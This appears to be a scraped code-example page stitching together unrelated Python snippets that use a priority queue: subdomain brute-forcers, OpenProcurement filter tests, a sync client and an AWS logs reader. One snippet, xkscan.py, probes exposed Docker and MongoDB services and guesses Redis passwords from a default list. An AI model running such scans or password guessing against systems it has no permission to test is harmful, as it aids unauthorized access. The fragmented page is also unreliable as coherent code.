        time_consuming = "time-consuming:%d seconds"%s
        print time_consuming
        self.logfile.write(time_consuming+'\n')
        time_consuming = "time-consuming:%d minutes" % m
        print time_consuming
        self.logfile.write(time_consuming+'\n')
        time_consuming = "time-consuming:%d hours" % h
        print time_consuming
        self.logfile.write(time_consuming+'\n')
        # 统计结果文件中各级域名的数量(self.fname是输出结果的文件名)
        ocount, bcount, tcount, fcount = self.get_distribution(self.fname)

        subdomain_count = '二级域名数量: %d' % ocount
        print subdomain_count
        self.logfile.write(subdomain_count+'\n')
        subdomain_count = '三级域名数量: %d' % bcount
        print subdomain_count
        self.logfile.write(subdomain_count+'\n')
        subdomain_count = '四级域名数量: %d' % tcount
        print subdomain_count
        self.logfile.write(subdomain_count+'\n')
        subdomain_count = '五级域名数量: %d' % fcount
        print subdomain_count
        self.logfile.write(subdomain_count+'\n')

        self.outfile.flush()
        self.outfile.close()
        self.outfile_ips.flush()
        self.outfile_ips.close()

    def get_distribution(self,filename):
        '''
        功能:统计结果文件filename中二级、三级和四级域名的数量
        '''
        with open(filename, 'rb') as f:
            subdomains = [line.strip() for line in f.readlines()]
        ocount = bcount = tcount = fcount = 0
        for domain in subdomains:
            if domain.count('.') == 2:
                ocount += 1
            elif domain.count('.') == 3:
                bcount += 1
            elif domain.count('.') == 4:
                tcount += 1
            else:
                fcount += 1

        return ocount, bcount, tcount, fcount
class TestResourceFilters(unittest.TestCase):
    db = {}
    conf = CONFIG

    @patch('openprocurement.bridge.frameworkagreement.filters.INFINITY')
    @patch('openprocurement.bridge.frameworkagreement.filters.logger')
    def test_CFAUAFilter(self, logger, infinity):
        self.input_queue = PriorityQueue()
        self.filtered_queue = PriorityQueue()

        resource = self.conf['resource'][:-1]

        filter = CFAUAFilter(self.conf, self.input_queue, self.filtered_queue,
                             self.db)
        mock_calls = [call.info('Init Close Framework Agreement Filter.')]
        self.assertEqual(logger.mock_calls, mock_calls)
        extra = {
            'MESSAGE_ID': 'SKIPPED',
            'JOURNAL_{}_ID'.format(resource.upper()): 'test_id'
        }

        infinity.__nonzero__.side_effect = [True, False]
        filter._run()

        doc = {'id': 'test_id', 'dateModified': '1970-01-01'}

        self.input_queue.put((None, doc))
        self.db['test_id'] = '1970-01-01'
        infinity.__nonzero__.side_effect = [True, False]
        filter._run()
        mock_calls.append(
            call.info(
                '{} test_id not modified from last check. Skipping'.format(
                    resource.title()),
                extra=extra))
        self.assertEqual(logger.mock_calls, mock_calls)

        doc['procurementMethodType'] = 'test'
        doc['dateModified'] = '1970-01-02'
        self.input_queue.put((None, doc))
        infinity.__nonzero__.side_effect = [True, False]
        filter._run()
        mock_calls.append(
            call.info('Skipping test {} test_id'.format(resource),
                      extra=extra))
        self.assertEqual(logger.mock_calls, mock_calls)

        filter.procurement_method_types = ('test')
        doc['status'] = 'test_status'
        self.input_queue.put((None, doc))
        infinity.__nonzero__.side_effect = [True, False]
        filter._run()
        mock_calls.append(
            call.info('Skipping test {} test_status test_id'.format(resource),
                      extra=extra))
        self.assertEqual(logger.mock_calls, mock_calls)

        filter.statuses = ('test_status')
        filter.lot_status = 'test_status'
        doc['lots'] = [{'status': 'spam_status'}]
        self.input_queue.put((None, doc))
        infinity.__nonzero__.side_effect = [True, False]
        filter._run()
        mock_calls.append(
            call.info(
                'Skipping multilot {} test_id in status test_status'.format(
                    resource),
                extra=extra))
        self.assertEqual(logger.mock_calls, mock_calls)

        del doc['lots']
        self.input_queue.put((None, doc))
        infinity.__nonzero__.side_effect = [True, False]
        filter._run()
        mock_calls.append(
            call.debug('Put to filtered queue {} test_id'.format(resource)))
        self.assertEqual(logger.mock_calls, mock_calls)
        priority, resource = self.filtered_queue.get()
        self.assertEqual(priority, None)
        self.assertEqual(resource, doc)
示例#15
0
文件: xkscan.py 项目: qsdj/xkscan
class Scanner:
    def __init__(self):
        self.start_time = time.time()
        self.queue = PriorityQueue()
        self.history = []
        self.total_count = 0
        self.scan_count = 0
        self._load_target()
        self.outfile = open("log.log", 'w')
        self.console_width = getTerminalSize()[0] - 2

    def _print_msg(self, _msg=None, _found_msg=False):
        if _msg is None:
            msg = '%s TotalCount| %s Scanned in %.2f seconds' % (
                    self.total_count,self.total_count - self.queue.qsize(), time.time() - self.start_time)
            sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) + msg)
        else:
            sys.stdout.write('\r' + _msg + ' ' * (self.console_width - len(_msg)) + '\n')
            self.outfile.write(_msg + '\n')
            self.outfile.flush()
            if _found_msg:
                msg = '%s TotalCount| %s Scanned in %.2f seconds' % (
                        self.total_count,self.total_count - self.queue.qsize(), time.time() - self.start_time)
                sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) + msg)
        sys.stdout.flush()

    def _load_target(self):
        print '[+] Read targets ...'
        target_file = raw_input("Target File :")
        with open(target_file) as f:
            for line in f.xreadlines():
                target = line.strip()
                self.queue.put(target)

        print "TotalCount is %d" % self.queue.qsize()
        self.total_count = self.queue.qsize()
        print "Now scanning ..."

    def _scan(self,case):
        while not self.queue.empty():
            target = self.queue.get()
            if case == "1":
                self.vulnCheck(target)
            if case == "2":
                self.s2_045(target)
            if case == "3":
                self.headers(target)
            if case == "4":
                self.weakfile(target)
            if case == "5":
                self.portscan_c(target)



#####################################################################
#                                                                   #
#    Vuln poc by:xi4okv QQ:48011203                                 #
#                                                                   #
#####################################################################

    def vulnCheck(self,target):
        if ":2375" in target:        
            try:
                res = requests.head("http://" + str(target) + "/containers/json",timeout=2)
                if res.headers['Content-Type'] == 'application/json':
                    self._print_msg(target + "==>  docker api Vuln",True)
                else:
                    self._print_msg()
            except:
                self._print_msg()
            self._print_msg()

        if ":27017" in target:
            ip,port = target.split(":")
            try:
                socket.setdefaulttimeout(3)
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                data = binascii.a2b_hex("3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000")
                s.send(data)
                result = s.recv(1024)
                if "ismaster" in result:
                    getlog_data = binascii.a2b_hex("480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000")
                    s.send(getlog_data)
                    result = s.recv(1024)
                    if "totalLinesWritten" in result:
                        self._print_msg(target + "==>  mongodb Vuln",True)
            except Exception, e:
                pass

        if ":6379" in target:
            ip,port = target.split(":")
            try:
                socket.setdefaulttimeout(3)
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("INFO\r\n")
                result = s.recv(1024)
                if "redis_version" in result:
                    self._print_msg(target + "==>  redis Vuln",True)
                elif "Authentication" in result:
                    for pass_ in ['123456','redis','pass','password']:
                        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        s.connect((ip, int(port)))
                        s.send("AUTH %s\r\n" % (pass_))
                        result = s.recv(1024)
                        if '+OK' in result:
                           self._print_msg(target + "==>  redis pass Vuln :" + pass_,True)
            except Exception, e:
                pass
class SyncClient:
    idle = idle
    backward_class = BackwardWorker
    forward_class = ForwardWorker

    def __init__(self,
                 host_url,
                 resource,
                 auth=None,
                 params={},
                 headers=None,
                 retrievers_params=DEFAULT_RETRIEVERS_PARAMS,
                 adaptive=False,
                 with_priority=False):
        LOGGER.info(f'Init SyncClient for resource {resource}')
        self.host = host_url
        self.auth = auth
        self.resource = resource
        self.adaptive = adaptive
        self.headers = headers

        self.params = params
        self.retrievers_params = retrievers_params
        self.queue = PriorityQueue(maxsize=retrievers_params['queue_size'])

    def init_clients(self):
        self.backward_client = ResourceClient(self.host, self.resource,
                                              self.params, self.auth,
                                              self.headers)
        self.forward_client = ResourceClient(self.host, self.resource,
                                             self.params, self.auth,
                                             self.headers)

    def handle_response_data(self, data):
        for resource_item in data:
            self.queue.put(PrioritizedItem(1, resource_item))

    def worker_watcher(self):
        while True:
            if time() - self.heartbeat > DEFAULT_FORWARD_HEARTBEAT:
                self.restart_sync()
                LOGGER.warning(
                    'Restart sync, reason: Last response from workers greater than 15 min ago.'
                )
            sleep(300)

    def start_sync(self):
        LOGGER.info('Start sync...')

        data = self.backward_client.get_resource_items(self.params)

        self.handle_response_data(data[f'{self.resource}s'])

        forward_params = deepcopy(self.params)
        forward_params.update({
            k: v[0]
            for k, v in parse.parse_qs(parse.urlparse(
                data.links.prev).query).items()
        })
        backward_params = deepcopy(self.params)
        backward_params.update({
            k: v[0]
            for k, v in parse.parse_qs(parse.urlparse(
                data.links.next).query).items()
        })

        self.forward_worker = self.forward_class(sync_client=self,
                                                 client=self.forward_client,
                                                 params=forward_params)
        self.backward_worker = self.backward_class(sync_client=self,
                                                   client=self.backward_client,
                                                   params=backward_params)
        self.workers = [self.forward_worker, self.backward_worker]

        for worker in self.workers:
            worker.start()
        self.heartbeat = time()
        self.watcher = spawn(self.worker_watcher)

    def restart_sync(self):
        """
        Restart retrieving from OCDS API.
        """

        LOGGER.info('Restart workers')
        for worker in self.workers:
            worker.kill()
        self.watcher.kill()
        self.init_clients()
        self.start_sync()

    def get_resource_items(self):
        self.init_clients()
        self.start_sync()
        while True:
            if self.forward_worker.check() or self.backward_worker.check():
                self.restart_sync()
            while not self.queue.empty():
                LOGGER.debug(f'Sync queue size: {self.queue.qsize()}',
                             extra={'SYNC_QUEUE_SIZE': self.queue.qsize()})
                LOGGER.debug('Yield resource item',
                             extra={'MESSAGE_ID': 'sync_yield'})
                item = self.queue.get()
                yield item.data
            LOGGER.debug(f'Sync queue size: {self.queue.qsize()}',
                         extra={'SYNC_QUEUE_SIZE': self.queue.qsize()})
            try:
                self.queue.peek(block=True, timeout=0.1)
            except Empty:
                pass
示例#17
0
class Track:
    def __init__(self, options, target):
        self.start_time = time.time()
        self.dns_servers = []
        self.options = options
        self.target = target
        self.resolvers = [dns.resolver.Resolver(configure=False) for _ in range(self.options.threads)]
        self.all_dns = dns.resolver.Resolver(configure=False)
        self.all_dns.nameservers = self.dns_servers
        detect_target.detect_target(self.target, True)
        self.dns_servers = dns_server.load_dns_server()
        self.dns_server_count = len(self.dns_servers)
        self.queue = PriorityQueue()
        self.priority = 0
        self.scan_count = self.confirm_count = 0
        self.confirm_subdomain = set()
        self.cdn = ''
        self.load_status = {}
        self.load_status = load_subdomain_name.load_sub_name(self.options, self.target, self.priority, self.queue)
        self.priority = self.load_status['priority']
        self.queue = self.load_status['queue']
        self.print_header_info()
        self.outfile = self.outfile_descriptor()


    def outfile_descriptor(self):
        if self.options.outfile:
            outfile_name = self.options.outfile + '.txt'
        else:
            outfile_name = self.target + '.txt'
        f = open(outfile_name, 'w')
        return f

    def print_header_info(self):
        print 'Domain Name\t\t\t\tIp Adress\t\tStatus\tCDN\tServer'
        print '------------\t\t\t\t----------\t\t------\t------\t---------'

    def subdomain_track(self, serial):
        dns_serial_number = serial % self.dns_server_count
        self.resolvers[serial].nameservers = [self.dns_servers[dns_serial_number]]
        while not self.queue.empty():
            try:
                subdomain_name = self.queue.get(timeout=1)[1]
                msg = '%.1fs | Found %d \r' % (time.time()-self.start_time, self.confirm_count)
                sys.stdout.write(msg)
                sys.stdout.flush()
                self.scan_count += 1
            except traceback:
                traceback.print_exc()
                sys.exit(1)
            try:
                if subdomain_name in self.confirm_subdomain:
                    continue
                if not self.options.crt:
                    subdomian_url = subdomain_name + '.' + self.target
                else:
                    subdomian_url = subdomain_name

                try:
                    dns_responses = self.resolvers[serial].query(subdomian_url)
                except dns.resolver.NoAnswer, e:
                    dns_responses = self.all_dns.query(subdomian_url)

                if len(dns_responses) > 1:
                    self.cdn = 'Yes'
                else:
                    self.cdn = 'Unknown'

                server_responses = detect_target.detect_target(subdomian_url)

                if dns_responses and server_responses:
                    self.confirm_subdomain.add(subdomain_name)
                    self.confirm_count += 1
                    ip = dns_responses[0].address
                    if server_responses.get('Server'):
                        server_info = server_responses['Server']
                    else:
                        server_info = 'Unknown'
                    status_code = server_responses['status_code']
                    print '%s\t\t%s\t\t%s\t%s\t%s' % (subdomian_url.ljust(30), ip, status_code, self.cdn, server_info)

                    msg = '%s\t\t%s\t\t%s\t%s\t%s' % (subdomian_url.ljust(30), ip, status_code, self.cdn, server_info)
                    self.outfile.write(msg)
                    self.outfile.flush()

            except (dns.resolver.NoAnswer, dns.resolver.NoNameservers, dns.exception.Timeout, dns.resolver.NXDOMAIN) as e:
                pass
            except Exception as e:
                traceback.print_exc()
                sys.exit(1)
示例#18
0
class SubNameBrute(object):
    def __init__(self, *params):
        (
            self.domain,
            self.options,
            self.process_num,
            self.dns_servers,
            self.next_subs,
            self.scan_count,
            self.found_count,
            self.queue_size_array,
            tmp_dir,
        ) = params
        self.dns_count = len(self.dns_servers)
        self.scan_count_local = 0
        self.found_count_local = 0
        self.resolvers = [
            dns.resolver.Resolver(configure=False)
            for _ in range(self.options.threads)
        ]
        for r in self.resolvers:
            r.lifetime = r.timeout = 10.0
        self.queue = PriorityQueue()
        self.priority = 0
        self.ip_dict = {}
        self.found_subs = set()
        self.timeout_subs = {}
        self.count_time = time.time()
        self.outfile = open(
            "%s/%s_part_%s.txt" % (tmp_dir, self.domain, self.process_num),
            "w")
        self.normal_names_set = set()
        self.load_sub_names()
        self.lock = RLock()

    def load_sub_names(self):
        normal_lines = []
        wildcard_lines = []
        wildcard_set = set()
        regex_list = []
        lines = set()
        with open(self.options.file) as inFile:
            for line in inFile.readlines():
                sub = line.strip()
                if not sub or sub in lines:
                    continue
                lines.add(sub)

                brace_count = sub.count("{")
                if brace_count > 0:
                    wildcard_lines.append((brace_count, sub))
                    sub = sub.replace("{alphnum}", "[a-z0-9]")
                    sub = sub.replace("{alpha}", "[a-z]")
                    sub = sub.replace("{num}", "[0-9]")
                    if sub not in wildcard_set:
                        wildcard_set.add(sub)
                        regex_list.append("^" + sub + "$")
                else:
                    normal_lines.append(sub)
                    self.normal_names_set.add(sub)

        if regex_list:
            pattern = "|".join(regex_list)
            _regex = re.compile(pattern)
            for line in normal_lines:
                if _regex.search(line):
                    normal_lines.remove(line)

        for _ in normal_lines[self.process_num::self.options.process]:
            self.queue.put((0, _))  # priority set to 0
        for _ in wildcard_lines[self.process_num::self.options.process]:
            self.queue.put(_)

    def scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]
                                         ] + self.dns_servers

        while True:
            try:
                self.lock.acquire()
                if time.time() - self.count_time > 1.0:
                    self.scan_count.value += self.scan_count_local
                    self.scan_count_local = 0
                    self.queue_size_array[
                        self.process_num] = self.queue.qsize()
                    if self.found_count_local:
                        self.found_count.value += self.found_count_local
                        self.found_count_local = 0
                    self.count_time = time.time()
                self.lock.release()
                brace_count, sub = self.queue.get(timeout=3.0)
                if brace_count > 0:
                    brace_count -= 1
                    if sub.find("{next_sub}") >= 0:
                        for _ in self.next_subs:
                            self.queue.put((0, sub.replace("{next_sub}", _)))
                    if sub.find("{alphnum}") >= 0:
                        for _ in "abcdefghijklmnopqrstuvwxyz0123456789":
                            self.queue.put(
                                (brace_count, sub.replace("{alphnum}", _, 1)))
                    elif sub.find("{alpha}") >= 0:
                        for _ in "abcdefghijklmnopqrstuvwxyz":
                            self.queue.put(
                                (brace_count, sub.replace("{alpha}", _, 1)))
                    elif sub.find("{num}") >= 0:
                        for _ in "0123456789":
                            self.queue.put(
                                (brace_count, sub.replace("{num}", _, 1)))
                    continue
            except gevent.queue.Empty as e:
                break

            try:

                if sub in self.found_subs:
                    continue

                self.scan_count_local += 1
                cur_domain = sub + "." + self.domain
                answers = self.resolvers[j].query(cur_domain)

                if answers:
                    self.found_subs.add(sub)
                    ips = ", ".join(
                        sorted([answer.address for answer in answers]))
                    if ips in ["1.1.1.1", "127.0.0.1", "0.0.0.0", "0.0.0.1"]:
                        continue
                    if self.options.i and is_intranet(answers[0].address):
                        continue

                    try:
                        self.scan_count_local += 1
                        answers = self.resolvers[j].query(cur_domain, "cname")
                        cname = answers[0].target.to_unicode().rstrip(".")
                        if cname.endswith(
                                self.domain) and cname not in self.found_subs:
                            cname_sub = cname[:len(cname) - len(self.domain) -
                                              1]  # new sub
                            if cname_sub not in self.normal_names_set:
                                self.found_subs.add(cname)
                                self.queue.put((0, cname_sub))
                    except Exception as e:
                        pass

                    first_level_sub = sub.split(".")[-1]
                    if (first_level_sub, ips) not in self.ip_dict:
                        self.ip_dict[(first_level_sub, ips)] = 1
                    else:
                        self.ip_dict[(first_level_sub, ips)] += 1
                        if self.ip_dict[(first_level_sub, ips)] > 30:
                            continue

                    self.found_count_local += 1

                    self.outfile.write(
                        cur_domain.ljust(30) + "\t" + ips + "\n")
                    self.outfile.flush()
                    try:
                        self.scan_count_local += 1
                        self.resolvers[j].query("test-not-existed." +
                                                cur_domain)
                    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                        if self.queue.qsize() < 10000:
                            for _ in self.next_subs:
                                self.queue.put((0, _ + "." + sub))
                        else:
                            self.queue.put((1, "{next_sub}." + sub))
                    except Exception as e:
                        pass

            except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                pass
            except dns.resolver.NoNameservers as e:
                self.queue.put((0, sub))  # Retry
            except dns.exception.Timeout as e:
                self.timeout_subs[sub] = self.timeout_subs.get(sub, 0) + 1
                if self.timeout_subs[sub] <= 2:
                    self.queue.put((0, sub))  # Retry
            except Exception as e:
                import traceback

                traceback.print_exc()
                with open("errors.log", "a") as errFile:
                    errFile.write("[%s] %s\n" % (type(e), str(e)))

    def run(self):
        threads = [
            gevent.spawn(self.scan, i) for i in range(self.options.threads)
        ]
        gevent.joinall(threads)
示例#19
0
class SubNameBrute:
    def __init__(self, target, args, process_num, dns_servers, next_subs,
                 scan_count, found_count, queue_size_list, tmp_dir):
        self.target = target.strip()
        self.args = args
        self.process_num = process_num
        self.dns_servers = dns_servers
        self.dns_count = len(dns_servers)
        self.next_subs = next_subs
        self.scan_count = scan_count
        self.scan_count_local = 0
        self.found_count = found_count
        self.found_count_local = 0
        self.queue_size_list = queue_size_list

        self.resolvers = [
            dns.resolver.Resolver(configure=False) for _ in range(args.threads)
        ]
        for _r in self.resolvers:
            _r.lifetime = _r.timeout = 6.0

        self.queue = PriorityQueue()
        self.item_index = 0
        self.priority = 0
        self._load_sub_names()
        self.ip_dict = {}
        self.found_subs = set()
        self.ex_resolver = dns.resolver.Resolver(configure=False)
        self.ex_resolver.nameservers = dns_servers
        self.local_time = time.time()
        self.outfile = open(
            '%s/%s_part_%s.txt' % (tmp_dir, target, process_num), 'w')
        self.outfile_html = open('tmp/%s_html_%s.txt' % (target, process_num),
                                 'w')

    def _load_sub_names(self):
        if self.args.full_scan and self.args.file == 'subnames.txt':
            _file = 'Dict/subnames_full.txt'
        else:
            if os.path.exists(self.args.file):
                _file = self.args.file
            elif os.path.exists('Dict/%s' % self.args.file):
                _file = 'Dict/%s' % self.args.file
            else:
                print_msg('[ERROR] Names file not found: %s' % self.args.file)
                exit(-1)

        normal_lines = []
        lines = set()
        with open(_file) as f:
            for line in f.xreadlines():
                sub = line.strip()
                if not sub or sub in lines:
                    continue
                lines.add(sub)
                normal_lines.append(sub)

        for item in normal_lines[self.process_num::self.args.process]:
            self.priority += 1
            self.queue.put((self.priority, item))

    def _scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]
        while not self.queue.empty():
            try:
                item = self.queue.get()[1]
                self.scan_count_local += 1
                if time.time() - self.local_time > 3.0:
                    self.scan_count.value += self.scan_count_local
                    self.scan_count_local = 0
                    self.queue_size_list[self.process_num] = self.queue.qsize()
            except Exception as e:
                break
            try:
                if item.find('{next_sub}') >= 0:
                    for _ in self.next_subs:
                        self.queue.put((0, item.replace('{next_sub}', _, 1)))
                    continue
                else:
                    sub = item

                if sub in self.found_subs:
                    continue

                cur_sub_domain = sub + '.' + self.target
                _sub = sub.split('.')[-1]
                try:
                    answers = self.resolvers[j].query(cur_sub_domain)
                except dns.resolver.NoAnswer, e:
                    answers = self.ex_resolver.query(cur_sub_domain)

                if answers:
                    self.found_subs.add(sub)
                    ips = ', '.join(
                        sorted([answer.address for answer in answers]))
                    if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0']:
                        continue

                    if self.args.intranet and is_intranet(answers[0].address):
                        continue

                    try:
                        self.scan_count_local += 1
                        answers = self.resolvers[j].query(
                            cur_sub_domain, 'cname')
                        cname = answers[0].target.to_unicode().rstrip('.')
                        if cname.endswith(
                                self.target) and cname not in self.found_subs:
                            self.found_subs.add(cname)
                            cname_sub = cname[:len(cname) - len(self.target) -
                                              1]
                            self.queue.put((0, cname_sub))

                    except:
                        pass

                    if (_sub, ips) not in self.ip_dict:
                        self.ip_dict[(_sub, ips)] = 1
                    else:
                        self.ip_dict[(_sub, ips)] += 1
                        if self.ip_dict[(_sub, ips)] > 30:
                            continue

                    self.found_count_local += 1
                    if time.time() - self.local_time > 3.0:
                        self.found_count.value += self.found_count_local
                        self.found_count_local = 0
                        self.queue_size_list[
                            self.process_num] = self.queue.qsize()
                        self.local_time = time.time()

                    self.outfile_html.write(
                        PrintHtml.Sub_html_print(cur_sub_domain, ips))
                    self.outfile_html.flush()
                    self.outfile.write(
                        cur_sub_domain.ljust(30) + '\t' + ips + '\n')
                    self.outfile.flush()
                    try:
                        self.resolvers[j].query('myzxcghelloha.' +
                                                cur_sub_domain)
                    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                        self.queue.put((999999999, '{next_sub}.' + sub))
                    except:
                        pass

            except (dns.resolver.NXDOMAIN, dns.name.EmptyLabel) as e:
                pass
            except (dns.resolver.NoNameservers, dns.resolver.NoAnswer,
                    dns.exception.Timeout) as e:
                pass
class TestStatuslistFilter(unittest.TestCase):
    def setUp(self):
        self.conf = CONFIG
        self.db = {}
        self.input_queue = PriorityQueue()
        self.filtered_queue = PriorityQueue()
        self.filter = StatuslistFilter(self.conf, self.input_queue,
                                       self.filtered_queue, self.db)

    @patch('openprocurement.bridge.rbot.filters.INFINITY')
    def test_filter_ok(self, infinity):
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-02',
            'procurementMethodType': 'dgf',
            'status': 'active.tendering',
            'documents': [{
                'documentType': 'contractProforma'
            }]
        }

        self.input_queue.put((None, deepcopy(doc)))
        self.filter._run()
        self.assertEqual(len(self.filtered_queue), 1)
        filtered_doc = self.filtered_queue.get(block=False)
        self.assertEqual(doc, filtered_doc[1])

    @patch('openprocurement.bridge.rbot.filters.INFINITY')
    def test_filter_not_modified(self, infinity):
        # Not changed dateModified
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'procurementMethodType': 'dgf',
            'status': 'status1',
            'documents': [{
                'documentType': 'contractProforma'
            }],
        }

        self.input_queue.put((None, deepcopy(doc)))
        self.db['test_id'] = '1970-01-01'

        self.filter._run()
        self.assertEqual(len(self.filtered_queue), 0)
        self.db.pop('test_id')

    @patch('openprocurement.bridge.rbot.filters.INFINITY')
    def test_filter_by_status(self, infinity):
        # Wrong tender status
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'procurementMethodType': 'dgf',
            'status': 'status3',
            'documents': [{
                'documentType': 'contractProforma'
            }],
        }

        self.input_queue.put((None, deepcopy(doc)))
        self.filter._run()
        self.assertEqual(len(self.filtered_queue), 0)
示例#21
0
文件: core.py 项目: scalp42/awslogs
class AWSLogs(object):

    ACTIVE = 1
    EXHAUSTED = 2
    WATCH_SLEEP = 2

    def __init__(self, **kwargs):
        self.connection_cls = kwargs.get('connection_cls', AWSConnection)
        self.aws_region = kwargs.get('aws_region')
        self.aws_access_key_id = kwargs.get('aws_access_key_id')
        self.aws_secret_access_key = kwargs.get('aws_secret_access_key')
        self.log_group_name = kwargs.get('log_group_name')
        self.log_stream_name = kwargs.get('log_stream_name')
        self.watch = kwargs.get('watch')
        self.color_enabled = kwargs.get('color_enabled')
        self.output_stream_enabled = kwargs.get('output_stream_enabled')
        self.output_group_enabled = kwargs.get('output_group_enabled')
        self.start = self.parse_datetime(kwargs.get('start'))
        self.end = self.parse_datetime(kwargs.get('end'))
        self.pool_size = max(kwargs.get('pool_size', 0), 10)
        self.max_group_length = 0
        self.max_stream_length = 0
        self.publishers = []
        self.events_queue = Queue()
        self.raw_events_queue = PriorityQueue()
        self.publishers_queue = PriorityQueue()
        self.publishers = []
        self.stream_status = {}
        self.stream_max_timestamp = {}

        self.connection = self.connection_cls(
            self.aws_region,
            aws_access_key_id=self.aws_access_key_id,
            aws_secret_access_key=self.aws_secret_access_key)

    def _get_streams_from_patterns(self, log_group_pattern,
                                   log_stream_pattern):
        """Returns pairs of group, stream matching ``log_group_pattern`` and
        ``log_stream_pattern``."""
        for group in self._get_groups_from_pattern(log_group_pattern):
            for stream in self._get_streams_from_pattern(
                    group, log_stream_pattern):
                yield group, stream

    def _get_groups_from_pattern(self, pattern):
        """Returns groups matching ``pattern``."""
        pattern = '.*' if pattern == 'ALL' else pattern
        reg = re.compile('^{0}'.format(pattern))
        for group in self.get_groups():
            if re.match(reg, group):
                yield group

    def _get_streams_from_pattern(self, group, pattern):
        """Returns streams in ``group`` matching ``pattern``."""
        pattern = '.*' if pattern == 'ALL' else pattern
        reg = re.compile('^{0}'.format(pattern))
        for stream in self.get_streams(group):
            if re.match(reg, stream):
                yield stream

    def _publisher_queue_consumer(self):
        """Consume ``publishers_queue`` api calls, run them and publish log
        events to ``raw_events_queue``. If ``nextForwardToken`` is present
        register a new api call into ``publishers_queue`` using as weight
        the timestamp of the latest event."""
        while True:
            try:
                _, (log_group_name, log_stream_name,
                    next_token) = self.publishers_queue.get(block=False)
            except Empty:
                if self.watch:
                    gevent.sleep(self.WATCH_SLEEP)
                    continue
                else:
                    break

            response = self.connection.get_log_events(
                next_token=next_token,
                log_group_name=log_group_name,
                log_stream_name=log_stream_name,
                start_time=self.start,
                end_time=self.end,
                start_from_head=True)

            if not len(response['events']):
                self.stream_status[(log_group_name,
                                    log_stream_name)] = self.EXHAUSTED
                continue

            self.stream_status[(log_group_name, log_stream_name)] = self.ACTIVE

            for event in response['events']:
                event['group'] = log_group_name
                event['stream'] = log_stream_name
                self.raw_events_queue.put((event['timestamp'], event))
                self.stream_max_timestamp[(
                    log_group_name, log_stream_name)] = event['timestamp']

            if 'nextForwardToken' in response:
                self.publishers_queue.put((response['events'][-1]['timestamp'],
                                           (log_group_name, log_stream_name,
                                            response['nextForwardToken'])))

    def _get_min_timestamp(self):
        """Return the minimum timestamp available across all active streams."""
        pending = [
            self.stream_max_timestamp[k]
            for k, v in self.stream_status.iteritems() if v != self.EXHAUSTED
        ]
        return min(pending) if pending else None

    def _get_all_streams_exhausted(self):
        """Return if all streams are exhausted."""
        return all(
            (s == self.EXHAUSTED for s in self.stream_status.itervalues()))

    def _raw_events_queue_consumer(self):
        """Consume events from ``raw_events_queue`` if all active streams
        have already publish events up to the ``_get_min_timestamp`` and
        register them in order into ``events_queue``."""
        while True:
            if self._get_all_streams_exhausted(
            ) and self.raw_events_queue.empty():
                if self.watch:
                    gevent.sleep(self.WATCH_SLEEP)
                    continue
                self.events_queue.put(NO_MORE_EVENTS)
                break

            try:
                timestamp, line = self.raw_events_queue.peek(timeout=1)
            except Empty:
                continue

            min_timestamp = self._get_min_timestamp()
            if min_timestamp and min_timestamp < timestamp:
                gevent.sleep(0.3)
                continue

            timestamp, line = self.raw_events_queue.get()

            output = [line['message']]
            if self.output_stream_enabled:
                output.insert(
                    0,
                    self.color(
                        line['stream'].ljust(self.max_stream_length, ' '),
                        'cyan'))
            if self.output_group_enabled:
                output.insert(
                    0,
                    self.color(line['group'].ljust(self.max_group_length, ' '),
                               'green'))
            self.events_queue.put("{0}\n".format(' '.join(output)))

    def _events_consumer(self):
        """Print events from ``events_queue`` as soon as they are available."""
        while True:
            event = self.events_queue.get(True)
            if event == NO_MORE_EVENTS:
                break
            sys.stdout.write(event)
            sys.stdout.flush()

    def list_logs(self):
        self.register_publishers()

        pool = Pool(size=self.pool_size)
        pool.spawn(self._raw_events_queue_consumer)
        pool.spawn(self._events_consumer)

        if self.watch:
            pool.spawn(self.register_publishers_periodically)

        for i in xrange(self.pool_size):
            pool.spawn(self._publisher_queue_consumer)
        pool.join()

    def register_publishers(self):
        """Register publishers into ``publishers_queue``."""
        for group, stream in self._get_streams_from_patterns(
                self.log_group_name, self.log_stream_name):
            if (group, stream) in self.publishers:
                continue
            self.publishers.append((group, stream))
            self.max_group_length = max(self.max_group_length, len(group))
            self.max_stream_length = max(self.max_stream_length, len(stream))
            self.publishers_queue.put((0, (group, stream, None)))
            self.stream_status[(group, stream)] = self.ACTIVE
            self.stream_max_timestamp[(group, stream)] = -1

    def register_publishers_periodically(self):
        while True:
            self.register_publishers()
            gevent.sleep(2)

    def list_groups(self):
        """Lists available CloudWatch logs groups"""
        for group in self.get_groups():
            print group

    def list_streams(self, *args, **kwargs):
        """Lists available CloudWatch logs streams in ``log_group_name``."""
        for stream in self.get_streams(*args, **kwargs):
            print stream

    def get_groups(self):
        """Returns available CloudWatch logs groups"""
        next_token = None
        while True:
            response = self.connection.describe_log_groups(
                next_token=next_token)

            for group in response.get('logGroups', []):
                yield group['logGroupName']

            if 'nextToken' in response:
                next_token = response['nextToken']
            else:
                break

    def get_streams(self, log_group_name=None):
        """Returns available CloudWatch logs streams in ``log_group_name``."""
        log_group_name = log_group_name or self.log_group_name
        next_token = None
        window_start = self.start or 0
        window_end = self.end or sys.maxint

        while True:
            response = self.connection.describe_log_streams(
                log_group_name=log_group_name, next_token=next_token)

            for stream in response.get('logStreams', []):
                if max(stream['firstEventTimestamp'], window_start) <= \
